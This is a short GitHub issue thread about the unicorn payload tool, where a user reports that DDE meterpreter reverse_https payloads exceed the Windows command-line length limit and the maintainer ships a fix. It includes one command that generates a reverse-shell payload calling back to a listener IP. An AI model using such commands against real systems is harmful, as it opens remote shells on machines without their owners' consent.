Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

DDE meterpreter/reverse_https payload consistently exceeds command line limit #64

Closed
strikeoncmputrz opened this issue Jan 6, 2018 · 3 comments

Comments

@strikeoncmputrz
Copy link

First, thank you Dave for this awesome tool!

I've been trying to generate a DDE meterpreter/reverse_https payload but I cannot due to the payload exceeding the command line limit.

I have tried with various IPs to include the example that unicorn provides: python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Unicorn provides this warning: [!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

I am using the latest version of unicorn via this repo. Thanks again!

@trustedsec
Copy link
Collaborator

Yeah, looks to be an issue with R7 updating the payload size, I'll see what I can do here.

@strikeoncmputrz
Copy link
Author

Thanks for the reply! I eventually settled for good old reverse_tcp and got my shell that way.

@trustedsec
Copy link
Collaborator

Fixed in the latest version, and glad to hear it! Just pushed a new version out that fixes the size length :) Thanks for the report!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant